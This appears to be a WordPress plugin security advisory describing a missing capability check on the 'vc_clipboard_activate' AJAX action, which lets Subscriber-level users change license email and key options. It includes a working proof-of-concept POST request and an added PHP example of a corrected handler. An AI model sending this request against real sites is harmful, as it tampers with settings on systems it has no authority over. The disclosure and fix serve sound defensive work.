An AJAX action registered by the plugin did not have capability checks, allowing low-privilege users, such as subscribers, to update the license options (key, email).
When logged in as a user with the Subscriber role or greater, submit a request to wp-admin/admin-ajax.php with action = "vc_clipboard_activate"; arbitrary data can then be added to the sanitized "email" or "license_key" parameters.

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 58
Connection: close
Cookie: [Subscriber+ cookies]

action=vc_clipboard_activate&email=a&license_key=something
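The shape of a handler that closes this gap, as an added example that is not the plugin's own code. The function name, nonce action, nonce field, option name and the choice of the manage_options capability are assumptions; only the action name and the two parameter names come from the advisory.

```php
<?php
// Added example, not the plugin's code. All example_* names are hypothetical.

// wp_ajax_{action} hooks fire for ANY logged-in user, Subscribers included,
// so authorization has to be enforced inside the handler itself.
add_action( 'wp_ajax_vc_clipboard_activate', 'example_vc_clipboard_activate' );

function example_vc_clipboard_activate() {
    // 1. Capability check: the step the advisory reports as missing.
    //    manage_options is an assumed choice for a site-wide license setting.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // 2. Nonce check (assumed extra hardening): ties the request to a form
    //    rendered for this user. Dies with a 403 if the nonce is invalid.
    check_ajax_referer( 'example_vc_clipboard_activate', 'nonce' );

    // 3. Sanitize both parameters named in the advisory.
    $email = isset( $_POST['email'] )
        ? sanitize_email( wp_unslash( $_POST['email'] ) )
        : '';
    $license_key = isset( $_POST['license_key'] )
        ? sanitize_text_field( wp_unslash( $_POST['license_key'] ) )
        : '';

    // sanitize_email() returns '' for a malformed address such as "a".
    if ( '' === $email || '' === $license_key ) {
        wp_send_json_error( array( 'message' => 'Invalid email or license key' ), 400 );
    }

    // 4. Only now persist the license options (hypothetical option name).
    update_option(
        'example_vc_clipboard_license',
        array(
            'email'       => $email,
            'license_key' => $license_key,
        ),
        false
    );

    wp_send_json_success();
}
```

With this handler, the request shown above, sent with Subscriber cookies, stops at step 1 with a 403 JSON error and the stored options are left unchanged.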
Charles Strader Sweethill
Yes
2021-04-06
2021-04-07